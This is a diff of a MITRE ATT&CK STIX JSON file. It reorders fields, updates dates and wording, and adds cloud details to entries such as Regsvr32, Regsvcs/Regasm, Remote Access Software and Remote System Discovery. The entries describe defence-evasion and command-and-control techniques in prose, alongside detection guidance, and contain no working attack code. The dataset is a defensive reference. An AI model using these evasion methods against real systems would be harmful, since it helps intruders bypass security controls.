+ "x_mitre_is_subtechnique": false,
+ "x_mitre_version": "3.0",
"x_mitre_data_sources": [
"Office 365 account logs",
"Azure activity logs",
@@ -21108,9 +21798,30 @@
"Authentication logs",
"Binary file metadata"
],
- "x_mitre_version": "3.0",
- "x_mitre_is_subtechnique": false,
- "x_mitre_deprecated": true
+ "x_mitre_defense_bypassed": [
+ "Network intrusion detection system",
+ "Anti-virus"
+ ],
+ "x_mitre_detection": "Existing methods of detecting remote access tools are helpful. Backup remote access tools or other access points may not have established command and control channels open during an intrusion, so the volume of data transferred may not be as high as the primary channel unless access is lost.\n\nDetection of tools based on beacon traffic, Command and Control protocol, or adversary infrastructure require prior threat intelligence on tools, IP addresses, and/or domains the adversary may use, along with the ability to detect use at the network boundary. Prior knowledge of indicators of compromise may also help detect adversary tools at the endpoint if tools are available to scan for those indicators.\n\nIf an intrusion is in progress and sufficient endpoint data or decoded command and control traffic is collected, then defenders will likely be able to detect additional tools dropped as the adversary is conducting the operation.\n\nFor alternative access using externally accessible VPNs or remote services, follow detection recommendations under [Valid Accounts](https://attack.mitre.org/techniques/T1078) and [External Remote Services](https://attack.mitre.org/techniques/T1133) to collect account use information.",
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows",
+ "AWS",
+ "GCP",
+ "Azure",
+ "Office 365",
+ "SaaS",
+ "Azure AD"
+ ],
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator",
+ "SYSTEM"
+ ],
+ "x_mitre_contributors": [
+ "Praetorian"
+ ]
},
{
"external_references": [
@@ -21166,6 +21877,19 @@
],
"modified": "2020-03-23T12:55:30.119Z",
"created": "2020-03-02T20:08:03.691Z",
+ "x_mitre_data_sources": [
+ "Sensor health and status",
+ "Network protocol analysis",
+ "Netflow/Enclave netflow",
+ "Network intrusion detection system",
+ "Network device logs"
+ ],
+ "x_mitre_detection": "Detection of reflection amplification can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness or services provided by an upstream network service provider. Typical network throughput monitoring tools such as netflow(Citation: Cisco DoSdetectNetflow), SNMP, and custom scripts can be used to detect sudden increases in network or service utilization. Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect a reflection amplification DoS event as it starts. Often, the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_impact_type": [
+ "Availability"
+ ],
"x_mitre_platforms": [
"macOS",
"Windows",
@@ -21176,19 +21900,6 @@
"GCP",
"Azure",
"SaaS"
- ],
- "x_mitre_impact_type": [
- "Availability"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Detection of reflection amplification can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness or services provided by an upstream network service provider. Typical network throughput monitoring tools such as netflow(Citation: Cisco DoSdetectNetflow), SNMP, and custom scripts can be used to detect sudden increases in network or service utilization. Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect a reflection amplification DoS event as it starts. Often, the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.",
- "x_mitre_data_sources": [
- "Sensor health and status",
- "Network protocol analysis",
- "Netflow/Enclave netflow",
- "Network intrusion detection system",
- "Network device logs"
]
},
{
@@ -21284,23 +21995,23 @@
],
"modified": "2020-03-25T16:16:26.182Z",
"created": "2020-01-23T22:02:48.566Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_contributors": [
- "Oddvar Moe, @oddvarmoe"
- ],
- "x_mitre_data_sources": [
- "Windows Registry",
- "File monitoring"
- ],
- "x_mitre_detection": "Monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Monitor the start folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys' Registry locations and startup folders. (Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data.\n\nChanges to these locations typically happen under normal conditions when legitimate software is installed. To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"Administrator",
"User"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_detection": "Monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Monitor the start folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys' Registry locations and startup folders. (Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data.\n\nChanges to these locations typically happen under normal conditions when legitimate software is installed. To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.",
+ "x_mitre_data_sources": [
+ "Windows Registry",
+ "File monitoring"
+ ],
+ "x_mitre_contributors": [
+ "Oddvar Moe, @oddvarmoe"
+ ],
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "attack-pattern--215190a9-9f02-4e83-bb5f-e0589965a302",
@@ -21339,7 +22050,7 @@
},
{
"id": "attack-pattern--c48a67ee-b657-45c1-91bf-6cdbe27205f8",
- "description": "Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)\n\nBoth utilities may be used to bypass process whitelisting through use of attributes within the binary to specify code that should be run before registration or unregistration: [ComRegisterFunction] or [ComUnregisterFunction] respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. (Citation: LOLBAS Regsvcs)(Citation: LOLBAS Regasm)",
+ "description": "Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)\n\nBoth utilities may be used to bypass application control through use of attributes within the binary to specify code that should be run before registration or unregistration: [ComRegisterFunction] or [ComUnregisterFunction] respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. (Citation: LOLBAS Regsvcs)(Citation: LOLBAS Regasm)",
"name": "Regsvcs/Regasm",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -21379,29 +22090,29 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-29T15:50:56.613Z",
+ "modified": "2020-06-20T22:36:37.411Z",
"created": "2020-01-23T19:42:16.439Z",
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_permissions_required": [
- "User",
- "Administrator"
- ],
- "x_mitre_defense_bypassed": [
- "Digital Certificate Validation",
- "Process whitelisting"
- ],
- "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of Regsvcs.exe and Regasm.exe. Compare recent invocations of Regsvcs.exe and Regasm.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after Regsvcs.exe or Regasm.exe invocation may also be useful in determining the origin and purpose of the binary being executed.",
- "x_mitre_data_sources": [
- "Process command-line parameters",
- "Process monitoring"
+ "x_mitre_platforms": [
+ "Windows"
],
"x_mitre_contributors": [
"Casey Smith"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_data_sources": [
+ "Process command-line parameters",
+ "Process monitoring"
+ ],
+ "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of Regsvcs.exe and Regasm.exe. Compare recent invocations of Regsvcs.exe and Regasm.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after Regsvcs.exe or Regasm.exe invocation may also be useful in determining the origin and purpose of the binary being executed.",
+ "x_mitre_defense_bypassed": [
+ "Digital Certificate Validation",
+ "Application control"
+ ],
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0"
},
{
"id": "attack-pattern--68f7e3a1-f09f-4164-9a62-16b648a0dd5a",
@@ -21441,7 +22152,7 @@
{
"id": "attack-pattern--b97f1d35-4249-4486-a6b5-ee60ccf24fab",
"name": "Regsvr32",
- "description": "Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary. (Citation: Microsoft Regsvr32)\n\nMalicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of whitelists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass process whitelisting using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a \"Squiblydoo\" attack and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov)\n\nRegsvr32.exe can also be leveraged to register a COM Object used to establish persistence via [Component Object Model Hijacking](https://attack.mitre.org/techniques/T1546/015). (Citation: Carbon Black Squiblydoo Apr 2016)",
+ "description": "Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary. (Citation: Microsoft Regsvr32)\n\nMalicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass application control using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a \"Squiblydoo\" attack and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov)\n\nRegsvr32.exe can also be leveraged to register a COM Object used to establish persistence via [Component Object Model Hijacking](https://attack.mitre.org/techniques/T1546/015). (Citation: Carbon Black Squiblydoo Apr 2016)",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
@@ -21480,38 +22191,38 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-29T15:56:13.129Z",
+ "modified": "2020-06-20T22:37:32.931Z",
"created": "2020-01-23T19:52:17.414Z",
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_defense_bypassed": [
- "Digital Certificate Validation",
- "Anti-virus",
- "Process whitelisting"
+ "x_mitre_platforms": [
+ "Windows"
],
- "x_mitre_permissions_required": [
- "Administrator",
- "User"
+ "x_mitre_contributors": [
+ "Casey Smith"
],
- "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of regsvr32.exe. Compare recent invocations of regsvr32.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Command arguments used before and after the regsvr32.exe invocation may also be useful in determining the origin and purpose of the script or DLL being loaded. (Citation: Carbon Black Squiblydoo Apr 2016)",
"x_mitre_data_sources": [
"Windows Registry",
"Process command-line parameters",
"Process monitoring",
"Loaded DLLs"
],
- "x_mitre_contributors": [
- "Casey Smith"
+ "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of regsvr32.exe. Compare recent invocations of regsvr32.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Command arguments used before and after the regsvr32.exe invocation may also be useful in determining the origin and purpose of the script or DLL being loaded. (Citation: Carbon Black Squiblydoo Apr 2016)",
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "User"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_defense_bypassed": [
+ "Digital Certificate Validation",
+ "Anti-virus",
+ "Application control"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0"
},
{
"id": "attack-pattern--4061e78c-1284-44b4-9116-73e4ac3912f7",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Remote Access Software",
- "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be whitelisted within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n\nRemote access tools may be established and used post-compromise as alternate communications channel for redundant access or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system.\n\nAdmin tools such as TeamViewer have been used by several groups targeting institutions in countries of interest to the Russian state and criminal campaigns. (Citation: CrowdStrike 2015 Global Threat Report) (Citation: CrySyS Blog TeamSpy)",
+ "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n\nRemote access tools may be established and used post-compromise as alternate communications channel for redundant access or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system.\n\nAdmin tools such as TeamViewer have been used by several groups targeting institutions in countries of interest to the Russian state and criminal campaigns. (Citation: CrowdStrike 2015 Global Threat Report) (Citation: CrySyS Blog TeamSpy)",
"external_references": [
{
"source_name": "mitre-attack",
@@ -21544,29 +22255,29 @@
"phase_name": "command-and-control"
}
],
- "modified": "2020-03-27T18:01:17.681Z",
+ "modified": "2020-06-20T20:42:37.320Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "2.0",
- "x_mitre_contributors": [
- "Matt Kelly, @breakersall"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Linux",
+ "Windows",
+ "macOS"
],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_network_requirements": true,
+ "x_mitre_detection": "Monitor for applications and processes related to remote admin tools. Correlate activity with other suspicious behavior that may reduce false positives if these tools are used by legitimate users and administrators.\n\nAnalyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol for the port that is being used.\n\n[Domain Fronting](https://attack.mitre.org/techniques/T1090/004) may be used in conjunction to avoid defenses. Adversaries will likely need to deploy and/or install these remote tools to compromised systems. It may be possible to detect or prevent the installation of these tools with host-based solutions.",
"x_mitre_data_sources": [
"Network intrusion detection system",
"Network protocol analysis",
"Process use of network",
"Process monitoring"
],
- "x_mitre_detection": "Monitor for applications and processes related to remote admin tools. Correlate activity with other suspicious behavior that may reduce false positives if these tools are used by legitimate users and administrators.\n\nAnalyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol for the port that is being used.\n\n[Domain Fronting](https://attack.mitre.org/techniques/T1090/004) may be used in conjunction to avoid defenses. Adversaries will likely need to deploy and/or install these remote tools to compromised systems. It may be possible to detect or prevent the installation of these tools with host-based solutions.",
- "x_mitre_network_requirements": true,
- "x_mitre_permissions_required": [
- "User"
+ "x_mitre_contributors": [
+ "Matt Kelly, @breakersall"
],
- "x_mitre_platforms": [
- "Linux",
- "Windows",
- "macOS"
- ],
- "x_mitre_is_subtechnique": false
+ "x_mitre_version": "2.0"
},
{
"external_references": [
@@ -21574,6 +22285,11 @@
"source_name": "mitre-attack",
"external_id": "T1074.002",
"url": "https://attack.mitre.org/techniques/T1074/002"
+ },
+ {
+ "source_name": "Mandiant M-Trends 2020",
+ "url": "https://content.fireeye.com/m-trends/rpt-m-trends-2020",
+ "description": "FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020."
}
],
"object_marking_refs": [
@@ -21581,7 +22297,7 @@
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Remote Data Staging",
- "description": "Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.\n\nBy staging data on one system prior to Exfiltration, adversaries can minimize the number of connections made to their C2 server and better evade detection.",
+ "description": "Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.\n\nIn cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)\n\nBy staging data on one system prior to Exfiltration, adversaries can minimize the number of connections made to their C2 server and better evade detection.",
"id": "attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0",
"type": "attack-pattern",
"kill_chain_phases": [
@@ -21590,8 +22306,19 @@
"phase_name": "collection"
}
],
- "modified": "2020-03-24T17:21:15.741Z",
+ "modified": "2020-06-24T18:59:15.833Z",
"created": "2020-03-13T21:14:58.206Z",
+ "x_mitre_contributors": [
+ "Praetorian"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.\n\nMonitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+ "x_mitre_data_sources": [
+ "Process command-line parameters",
+ "Process monitoring",
+ "File monitoring"
+ ],
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -21599,15 +22326,7 @@
"AWS",
"GCP",
"Azure"
- ],
- "x_mitre_data_sources": [
- "Process command-line parameters",
- "Process monitoring",
- "File monitoring"
- ],
- "x_mitre_detection": "Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.\n\nMonitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ ]
},
{
"external_references": [
@@ -21693,29 +22412,45 @@
],
"modified": "2020-02-25T19:23:34.204Z",
"created": "2020-02-11T18:23:26.059Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_contributors": [
+ "Matthew Demaske, Adaptforward"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Use of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.",
- "x_mitre_permissions_required": [
- "Remote Desktop Users",
- "User"
+ "x_mitre_system_requirements": [
+ "RDP service enabled, account in the Remote Desktop Users group"
],
"x_mitre_data_sources": [
"Process monitoring",
"Netflow/Enclave netflow",
"Authentication logs"
],
- "x_mitre_system_requirements": [
- "RDP service enabled, account in the Remote Desktop Users group"
+ "x_mitre_permissions_required": [
+ "Remote Desktop Users",
+ "User"
],
- "x_mitre_contributors": [
- "Matthew Demaske, Adaptforward"
+ "x_mitre_detection": "Use of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
+ "created": "2020-02-19T18:52:24.547Z",
+ "modified": "2020-02-19T20:53:50.908Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "collection"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--b4694861-542c-48ea-9eb1-10d356e7140a",
+ "description": "Adversaries may target an Exchange server or Office 365 to collect sensitive information. Adversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network. Adversaries may also access externally facing Exchange services or Office 365 to access email using credentials or access tokens. Tools such as [MailSniper](https://attack.mitre.org/software/S0413) can be used to automate searches for specific keywords.",
+ "name": "Remote Email Collection",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -21723,22 +22458,6 @@
"url": "https://attack.mitre.org/techniques/T1114/002"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Remote Email Collection",
- "description": "Adversaries may target an Exchange server or Office 365 to collect sensitive information. Adversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network. Adversaries may also access externally facing Exchange services or Office 365 to access email using credentials or access tokens. Tools such as [MailSniper](https://attack.mitre.org/software/S0413) can be used to automate searches for specific keywords.",
- "id": "attack-pattern--b4694861-542c-48ea-9eb1-10d356e7140a",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "collection"
- }
- ],
- "modified": "2020-02-19T20:53:50.908Z",
- "created": "2020-02-19T18:52:24.547Z",
"x_mitre_platforms": [
"Office 365",
"Windows"
@@ -21787,30 +22506,38 @@
],
"modified": "2020-03-23T23:35:58.129Z",
"created": "2020-02-25T18:26:16.994Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_permissions_required": [
- "SYSTEM",
- "root"
- ],
- "x_mitre_is_subtechnique": false,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Use of these services may be legitimate, depending upon the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with that service. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.\n\nMonitor for processes and command-line arguments associated with hijacking service sessions.",
"x_mitre_data_sources": [
"Process command-line parameters",
"Process monitoring",
"Netflow/Enclave netflow",
"Authentication logs"
+ ],
+ "x_mitre_detection": "Use of these services may be legitimate, depending upon the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with that service. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.\n\nMonitor for processes and command-line arguments associated with hijacking service sessions.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_permissions_required": [
+ "SYSTEM",
+ "root"
+ ],
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
]
},
{
- "id": "attack-pattern--54a649ff-439a-41a4-9856-8d144a2551ba",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Remote Services",
- "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.\n\nIn an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP).(Citation: SSH Secure Shell)(Citation: TechNet Remote Desktop Services)",
+ "created": "2017-05-31T21:30:29.858Z",
+ "modified": "2020-03-25T12:25:03.251Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "lateral-movement"
+ }
+ ],
+ "type": "attack-pattern",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -21833,18 +22560,10 @@
"source_name": "TechNet Remote Desktop Services"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "lateral-movement"
- }
- ],
- "modified": "2020-03-25T12:25:03.251Z",
- "created": "2017-05-31T21:30:29.858Z",
+ "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.\n\nIn an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP).(Citation: SSH Secure Shell)(Citation: TechNet Remote Desktop Services)",
+ "name": "Remote Services",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "id": "attack-pattern--54a649ff-439a-41a4-9856-8d144a2551ba",
"x_mitre_is_subtechnique": false,
"x_mitre_version": "1.1",
"x_mitre_detection": "Correlate use of login activity related to remote services with unusual behavior or other malicious or suspicious activity. Adversaries will likely need to learn about an environment and the relationships between systems through Discovery techniques prior to attempting Lateral Movement.",
@@ -21876,17 +22595,37 @@
"id": "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Remote System Discovery",
- "description": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://attack.mitre.org/software/S0097) or net view using [Net](https://attack.mitre.org/software/S0039). Adversaries may also use local host files (ex: C:\\Windows\\System32\\Drivers\\etc\\hosts or /etc/hosts) in order to discover the hostname to IP address mappings of remote systems. \n\nSpecific to macOS, the bonjour protocol exists to discover additional Mac-based systems within the same broadcast domain. In cloud environments, many typical utilities may be used to discover remote systems depending upon the host operating system. In addition, cloud environments often provide APIs that serve information about remote systems and services.",
+ "description": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://attack.mitre.org/software/S0097) or net view using [Net](https://attack.mitre.org/software/S0039). Adversaries may also use local host files (ex: C:\\Windows\\System32\\Drivers\\etc\\hosts or /etc/hosts) in order to discover the hostname to IP address mappings of remote systems. \n\nSpecific to macOS, the bonjour protocol exists to discover additional Mac-based systems within the same broadcast domain.\n\nWithin IaaS (Infrastructure as a Service) environments, remote systems include instances and virtual machines in various states, including the running or stopped state. Cloud providers have created methods to serve information about remote systems, such as APIs and CLIs. For example, AWS provides a DescribeInstances API within the Amazon EC2 API and a describe-instances command within the AWS CLI that can return information about all instances within an account.(Citation: Amazon Describe Instances API)(Citation: Amazon Describe Instances CLI) Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list command to list all Google Compute Engine instances in a project, and Azure's CLI az vm list lists details of virtual machines.(Citation: Google Compute Instances)(Citation: Azure VM List)",
"external_references": [
{
"source_name": "mitre-attack",
- "url": "https://attack.mitre.org/techniques/T1018",
- "external_id": "T1018"
+ "external_id": "T1018",
+ "url": "https://attack.mitre.org/techniques/T1018"
},
{
"external_id": "CAPEC-292",
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/292.html"
+ },
+ {
+ "source_name": "Amazon Describe Instances API",
